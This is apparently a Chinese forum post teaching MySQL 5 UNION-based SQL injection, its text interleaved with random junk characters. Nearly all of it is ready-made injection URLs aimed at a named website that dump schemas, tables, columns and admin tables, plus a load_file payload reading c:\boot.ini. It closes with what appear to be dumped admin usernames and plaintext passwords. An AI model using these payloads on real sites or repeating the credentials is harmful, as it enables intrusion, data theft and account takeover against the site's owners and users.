此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
. A; w9 W5 p+ [8 P( O4 ?但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人. i2 E3 ?) a& k+ q D
; x: @2 I b2 E; V* r
: w# X( M5 E8 Z1 \7 z% M
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
# F' V5 s; E& i9 H7 d/ d6 [- G& s* q' W+ ^5 i% J4 Y
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
' i' a6 b* }3 Y! Y0 W, Y) F6 N) V% ?
5 ?" l/ v1 W) z, ]( |, |! s下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
4 I. w$ ^$ S4 J2 ~- |5 d0 r/ u# O在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
3 @) \, v' |6 Y, J3 B/ Y
9 g9 p; R% o1 o& T. L, i4 r/ t! d, `http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
7 c5 B: h8 b" a. d6 B: c! R
+ e1 b9 U! Z7 M7 v% ]- K- L7 d读出所有库:- y, n: \0 e, b
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
; v9 s) V* m) ^& a8 K3 {4 B1 @/ T4 x+ T2 y: X' k- E) S5 H
S! c8 p; p2 |. `* M
4 q$ t/ X+ w& L读出所有表:2 b" ?+ L$ x# [! Y. Y7 d
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()# P1 @7 K) |1 \3 T+ D7 c. g/ ^
) d$ u6 T6 J. T) m" c6 g: @
读出所有表字段:
6 y! l: c$ O$ ], o& O7 e% c6 `http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)) M! a4 x- x- k& T
*/ (97,100,109,105,110)为admin的ascii码 依次类推
5 u' d$ I. U2 o6 n! M
) b2 q$ ?+ Q$ s, ^; N! n读出所有表字段里的内容:
' [" V) Z& @2 X( J4 `http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin: h8 k6 n7 }& D1 O" V2 s8 G
$ l/ ?8 o8 {' r l+ O
2 E4 n/ ?' p, c% @, o" u
$ c; _ @, O* s" b$ o$ t# \7 }* k; j: P/ k
+ k+ b% M5 Y8 Q7 d) {; x4 V
N8 {% F4 ^' {- C7 @http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%230 T' @8 L) D4 G) {" O- r5 a
! r2 y8 d( r c j* H
. ~% x9 R, [4 o6 q- J/ o \' t* mhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
) ^- l7 Q4 V+ ~2 X6 ]# u3 L1 ]5 A2 B4 z: b; x3 C( X( }7 c2 ^* e
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23# L( F. \- q9 `3 G6 z" x) j
, h0 ]# \ k- }! z8 o) ?4 Z( h0 [
0 }9 b9 X; X" i* E4 d" C3 Y1 Nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23( m7 N8 L; I( M/ q0 s* P
' X2 C+ P3 g7 x& U
7 P5 M3 H: f0 \% p- i' W$ Z webmaster:dzb521123,simlab:simadmin20043233
) x" w$ m; r3 a) q$ Q |